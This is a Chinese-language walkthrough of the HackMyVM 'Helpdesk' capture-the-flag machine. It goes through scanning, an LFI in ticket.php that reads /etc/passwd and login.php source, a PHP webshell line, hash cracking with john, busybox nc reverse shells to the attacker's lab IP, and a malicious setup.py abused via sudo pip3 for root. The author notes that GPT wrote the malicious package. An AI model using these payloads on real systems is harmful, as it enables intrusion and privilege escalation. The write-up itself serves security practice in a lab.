HackMyVM-Helpdesk-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.153  08:00:27:e5:04:39       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:fc:db:36       VMware, Inc.
^C
❯ export ip=192.168.60.153
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.60.153:22
Open 192.168.60.153:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 12:08 CST
Initiating ARP Ping Scan at 12:08
Scanning 192.168.60.153 [1 port]
Completed ARP Ping Scan at 12:08, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:08
Completed Parallel DNS resolution of 1 host. at 12:08, 0.57s elapsed
DNS resolution of 1 IPs took 0.57s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 12:08
Scanning 192.168.60.153 [2 ports]
Discovered open port 22/tcp on 192.168.60.153
Discovered open port 80/tcp on 192.168.60.153
Completed SYN Stealth Scan at 12:08, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.60.153
Host is up, received arp-response (0.00045s latency).
Scanned at 2025-08-24 12:08:45 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:E5:04:39 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.72 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

目录枚举

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.153
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,zip,txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 1290]
/login.php            (Status: 200) [Size: 1819]
/javascript           (Status: 301) [Size: 241] [--> http://192.168.60.153/javascript/]
/helpdesk             (Status: 301) [Size: 239] [--> http://192.168.60.153/helpdesk/]
/ticket.php           (Status: 200) [Size: 204]
/panel.php            (Status: 302) [Size: 0] [--> login.php]
/debug.php            (Status: 200) [Size: 250]

存在debug.php页面，其实泄露了测试凭证service_user:SuperSecretDev123!

但其实此凭证是不能登入到login.php中的，虚晃一枪🤣

LFI文件包含

其实还可以注意到目录枚举的结果中还存在ticket.php，尝试访问一下

❯ curl $ip/ticket.php
<style>
body { font-family: sans-serif; background: #f0f0f0; padding: 20px; }
pre { background: #fff; padding: 10px; border-left: 4px solid #4A90E2; }
h1 { color: #4A90E2; }
</style><h1>Ticket Viewer</h1>%

类似一个票据浏览的功能？尝试fuzz一下可能存在LFI文件包含漏洞

❯ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u "http://$ip/ticket.php?FUZZ=../../../../../etc/passwd" --hw 28
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.153/ticket.php?FUZZ=../../../../../etc/passwd
Total requests: 207643

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000001200:   200        40 L     82 W       2135 Ch     "url"
^C000005796:   200        4 L      28 W       204 Ch      "invisible"

Total time: 0
Processed Requests: 5801
Filtered Requests: 5800
Requests/sec.: 0

拿到参数url了，直接访问一下

得知存在helpdesk用户

❯ curl "$ip/ticket.php?url=../../../../../etc/passwd"
<style>
body { font-family: sans-serif; background: #f0f0f0; padding: 20px; }
pre { background: #fff; padding: 10px; border-left: 4px solid #4A90E2; }
h1 { color: #4A90E2; }
</style><h1>Ticket Viewer</h1><h1>Ticket Viewer</h1><pre>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
dhcpcd:x:100:65534:DHCP Client Daemon,,,:/usr/lib/dhcpcd:/bin/false
messagebus:x:101:102::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:992:992:systemd Resolver:/:/usr/sbin/nologin
pollinate:x:102:1::/var/cache/pollinate:/bin/false
polkitd:x:991:991:User for polkitd:/:/usr/sbin/nologin
syslog:x:103:104::/nonexistent:/usr/sbin/nologin
uuidd:x:104:105::/run/uuidd:/usr/sbin/nologin
tcpdump:x:105:107::/nonexistent:/usr/sbin/nologin
tss:x:106:108:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:107:109::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
mrmidnight:x:1000:1000:MrMidnight:/home/mrmidnight:/bin/bash
mysql:x:110:110:MySQL Server,,,:/nonexistent:/bin/false
helpdesk:x:1001:1001::/home/helpdesk:/bin/bash
</pre>%

尝试利用php流过滤器进行读取

❯ curl "$ip/ticket.php?url=php://filter/convert.base64-encode/resource=../../../../../etc/passwd"
<style>
body { font-family: sans-serif; background: #f0f0f0; padding: 20px; }
pre { background: #fff; padding: 10px; border-left: 4px solid #4A90E2; }
h1 { color: #4A90E2; }
</style><h1>Ticket Viewer</h1><h1>Ticket Viewer</h1><pre>cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovcnVuL2lyY2Q6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjQyOjY1NTM0Ojovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4Kbm9ib2R5Ong6NjU1MzQ6NjU1MzQ6bm9ib2R5Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzeXN0ZW1kLW5ldHdvcms6eDo5OTg6OTk4OnN5c3RlbWQgTmV0d29yayBNYW5hZ2VtZW50Oi86L3Vzci9zYmluL25vbG9naW4Kc3lzdGVtZC10aW1lc3luYzp4Ojk5Nzo5OTc6c3lzdGVtZCBUaW1lIFN5bmNocm9uaXphdGlvbjovOi91c3Ivc2Jpbi9ub2xvZ2luCmRoY3BjZDp4OjEwMDo2NTUzNDpESENQIENsaWVudCBEYWVtb24sLCw6L3Vzci9saWIvZGhjcGNkOi9iaW4vZmFsc2UKbWVzc2FnZWJ1czp4OjEwMToxMDI6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzeXN0ZW1kLXJlc29sdmU6eDo5OTI6OTkyOnN5c3RlbWQgUmVzb2x2ZXI6LzovdXNyL3NiaW4vbm9sb2dpbgpwb2xsaW5hdGU6eDoxMDI6MTo6L3Zhci9jYWNoZS9wb2xsaW5hdGU6L2Jpbi9mYWxzZQpwb2xraXRkOng6OTkxOjk5MTpVc2VyIGZvciBwb2xraXRkOi86L3Vzci9zYmluL25vbG9naW4Kc3lzbG9nOng6MTAzOjEwNDo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnV1aWRkOng6MTA0OjEwNTo6L3J1bi91dWlkZDovdXNyL3NiaW4vbm9sb2dpbgp0Y3BkdW1wOng6MTA1OjEwNzo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnRzczp4OjEwNjoxMDg6VFBNIHNvZnR3YXJlIHN0YWNrLCwsOi92YXIvbGliL3RwbTovYmluL2ZhbHNlCmxhbmRzY2FwZTp4OjEwNzoxMDk6Oi92YXIvbGliL2xhbmRzY2FwZTovdXNyL3NiaW4vbm9sb2dpbgpmd3VwZC1yZWZyZXNoOng6OTg5Ojk4OTpGaXJtd2FyZSB1cGRhdGUgZGFlbW9uOi92YXIvbGliL2Z3dXBkOi91c3Ivc2Jpbi9ub2xvZ2luCnVzYm11eDp4OjEwODo0Njp1c2JtdXggZGFlbW9uLCwsOi92YXIvbGliL3VzYm11eDovdXNyL3NiaW4vbm9sb2dpbgpzc2hkOng6MTA5OjY1NTM0OjovcnVuL3NzaGQ6L3Vzci9zYmluL25vbG9naW4KbXJtaWRuaWdodDp4OjEwMDA6MTAwMDpNck1pZG5pZ2h0Oi9ob21lL21ybWlkbmlnaHQ6L2Jpbi9iYXNoCm15c3FsOng6MTEwOjExMDpNeVNRTCBTZXJ2ZXIsLCw6L25vbmV4aXN0ZW50Oi9iaW4vZmFsc2UKaGVscGRlc2s6eDoxMDAxOjEwMDE6Oi9ob21lL2hlbHBkZXNrOi9iaW4vYmFzaAo=</pre>

参考如下文章

HackMyVM-Medusa-Walkthrough | Pepster’Blog

那直接LFI2Rce拿shell了，然而想的没这么简单，哈哈😅

他只会当作文本显示出来，并不会去解析其中php的语句

<style>
body { font-family: sans-serif; background: #f0f0f0; padding: 20px; }
pre { background: #fff; padding: 10px; border-left: 4px solid #4A90E2; }
h1 { color: #4A90E2; }
</style><h1>Ticket Viewer</h1><h1>Ticket Viewer</h1><pre><?=`$_GET[0]`?>@C>==@C>==@C>==@C>==@C>==@</pre>

凭证爆破

尝试LFI读取一下login.php

❯ curl "$ip/ticket.php?url=../../../../../var/www/html/login.php"
<style>
body { font-family: sans-serif; background: #f0f0f0; padding: 20px; }
pre { background: #fff; padding: 10px; border-left: 4px solid #4A90E2; }
h1 { color: #4A90E2; }
</style><h1>Ticket Viewer</h1><h1>Ticket Viewer</h1><pre><?php
session_start();

// Enable PHP error display for debugging (remove in production)
ini_set('display_errors', 1);
error_reporting(E_ALL);

// Stored credentials
$stored_user = 'helpdesk';

// SHA-512 hash for password: ticketmaster
$stored_hash = '$6$ABC123$fLo2MacCV.XBQeRZtHWL2297q/fUBs/b8gOmvLGuiz7wDgl3MSWcOOSKnTbaNPoUMCmEpY1dlwuPKbAtIuoo6.';

// Handle login
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $user = $_POST['username'] ?? '';
    $pass = $_POST['password'] ?? '';

    if ($user === $stored_user && crypt($pass, $stored_hash) === $stored_hash) {
        $_SESSION['auth'] = true;
        header("Location: panel.php");
        exit;
    } else {
        $error = "Invalid username or password.";
    }
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>HelpDesk Login</title>
…………………………
</head>
<body>
  <div class="login-box">
    <h2>HelpDesk Admin Login</h2>
    <form method="POST">
      <input type="text" name="username" placeholder="Username" required><br>
      <input type="password" name="password" placeholder="Password" required><br>
      <button type="submit">Login</button>
    </form>
    <?php if (isset($error)) echo "<div class='error'>$error</div>"; ?>
  </div>
  <footer>&copy; 2025 HelpDesk Ticketing System</footer>
</body>
</html>

</pre>

很明显账户是硬编码的，尝试爆破一下

得到凭证helpdesk:ticketmaster

❯ vi hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ticketmaster     (?)
1g 0:00:01:10 DONE (2025-08-24 12:34) 0.01422g/s 10965p/s 10965c/s 10965C/s timo32..tiago3
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

可以执行命令

用户提权

监听端口，反弹个shell回来

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.60.100
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from helpdesk-192.168.60.153-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/helpdesk~192.168.60.153_Linux_x86_64/2025_08_24-12_41_18-083.log 📜
───────────────────────────────────────────────────────────────────────────
www-data@helpdesk:/var/www/html$

在opt目录下存在sock文件

www-data@helpdesk:/opt/helpdesk-socket$ ls -al
total 16
drwxr-xr-x 2 helpdesk helpdesk 4096 Aug 24 04:06 .
drwxr-xr-x 4 root     root     4096 Aug 16 15:32 ..
-rwxr-xr-x 1 helpdesk helpdesk  158 Aug 16 15:32 handler.sh
srwxrwxrwx 1 helpdesk helpdesk    0 Aug 24 04:06 helpdesk.sock
-rw-r--r-- 1 root     root      184 Aug 16 15:44 serve.sh

利用socat连接一下

可以利用helpdesk用户执行命令，不过只能执行一次

www-data@helpdesk:/opt/helpdesk-socket$ socat - unix-connect:helpdesk.sock
id
[HelpDesk Automation] Executing: id
uid=1001(helpdesk) gid=1001(helpdesk) groups=1001(helpdesk)

再次弹个shell

Root提权

用户存在sudo权限，可以执行pip3

www-data@helpdesk:/opt/helpdesk-socket$ socat - unix-connect:helpdesk.sock
busybox nc 192.168.60.100 4444 -e /bin/bash
[HelpDesk Automation] Executing: busybox nc 192.168.60.100 4444 -e /bin/bash
[+] Got reverse shell from helpdesk-192.168.60.153-Linux-x86_64 😍️ Assigned SessionID <2>
(Penelope)─(Session [1])> interact 2
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [2], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/helpdesk~192.168.60.153_Linux_x86_64/2025_08_24-12_46_57-819.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
helpdesk@helpdesk:/$ cd ~
helpdesk@helpdesk:~$ cat user.txt
flag{ticket_approved_by_thedesk}
helpdesk@helpdesk:~$ sudo -l
Matching Defaults entries for helpdesk on helpdesk:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User helpdesk may run the following commands on helpdesk:
    (ALL) NOPASSWD: /usr/bin/pip3 install --break-system-packages *

这里我直接让GPT给出恶意的脚本代码

from setuptools import setup
import os

# --- 恶意代码开始 ---
# 在安装过程中执行系统命令
try:
    os.system("busybox nc 192.168.60.100 4444 -e /bin/bash")
except Exception as e:
    print(f"Malicious code execution failed: {e}")
# --- 恶意代码结束 ---

setup(
    name='very-innocent-package',
    version='0.0.1',
    description='A seemingly harmless package.',
    long_description='This package demonstrates a potential supply chain attack.',
    url='https://example.com/not-malicious',
    author='Attacker',
    author_email='attacker@example.com',
    keywords='example, security, test',
    packages=[], # 通常恶意包不需要包含实际的功能代码
    classifiers=[
        'Programming Language :: Python :: 3',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
    ],
    # 也可以在这里添加 entry_points 来隐藏恶意功能，
    # 但直接在setup.py的顶层执行通常更直接。
)

将此文件命名为setup.py，放到随便任意一个文件夹中，我这里就新建了exp文件夹

helpdesk@helpdesk:~$ mkdir exp
helpdesk@helpdesk:~$ mv setup.py exp
helpdesk@helpdesk:~$ sudo /usr/bin/pip3 install --break-system-packages ./exp
Processing ./exp
[+] Got reverse shell from helpdesk-192.168.60.153-Linux-x86_64 😍️ Assigned SessionID <3>
(Penelope)─(Session [2])> interact 3
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [3], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/helpdesk~192.168.60.153_Linux_x86_64/2025_08_24-12_57_24-374.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
root@helpdesk:/home/helpdesk/exp# cd ~
root@helpdesk:~# cat root.txt
flag{request_has_been_escalated}

后记

具体实现代码

root@helpdesk:~# cat cleanup.sh
#!/bin/bash

# Reset hash
HASHED=$(openssl passwd -6 -salt ABC123 'ticket1234')
usermod -p "$HASHED" helpdesk

# Reset dev server
systemctl restart devserver

# Reset pip path
rm -f /tmp/*
rm -rf /tmp/*

echo "[+] CTF Reset Complete"
root@helpdesk:~# systemctl status devserver
● devserver.service - Internal Dev Service
     Loaded: loaded (/etc/systemd/system/devserver.service; enabled; preset: enabled)
     Active: active (running) since Sun 2025-08-24 04:06:23 UTC; 53min ago
   Main PID: 702 (python3)
      Tasks: 1 (limit: 7124)
     Memory: 17.9M (peak: 18.2M)
        CPU: 724ms
     CGroup: /system.slice/devserver.service
             └─702 /usr/bin/python3 /opt/dev_server/server.py

Aug 24 04:06:23 helpdesk systemd[1]: Started devserver.service - Internal Dev Service.
root@helpdesk:~# cat /etc/systemd/system/devserver.service
[Unit]
Description=Internal Dev Service

[Service]
ExecStart=/usr/bin/python3 /opt/dev_server/server.py
Restart=always

[Install]
WantedBy=multi-user.target
root@helpdesk:~# cat /opt/dev_server/server.py
from http.server import BaseHTTPRequestHandler, HTTPServer

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/":
            self.send_response(200)
            self.send_header('Content-type', 'text/plain')
            self.end_headers()
            self.wfile.write(b"Internal Dev API - v0.2\n")
            self.wfile.write(b"For authorized service use only.\n")

        elif self.path == "/dump":
            self.send_response(200)
            self.send_header('Content-type', 'text/plain')
            self.end_headers()
            self.wfile.write(b"[DEV DEBUG] Username: helpdesk\n")
            self.wfile.write(b"[DEV DEBUG] Hash: $6$rounds=10000$ABC123$8TZKHwbjkGZ.LfK/...REDACTED...\n")

        else:
            self.send_response(404)
            self.send_header('Content-type', 'text/plain')
            self.end_headers()
            self.wfile.write(b"404 - Not Found\n")

if __name__ == "__main__":
    print("Starting internal dev server on 127.0.0.1:8000...")
    httpd = HTTPServer(('127.0.0.1', 8000), Handler)
    httpd.serve_forever()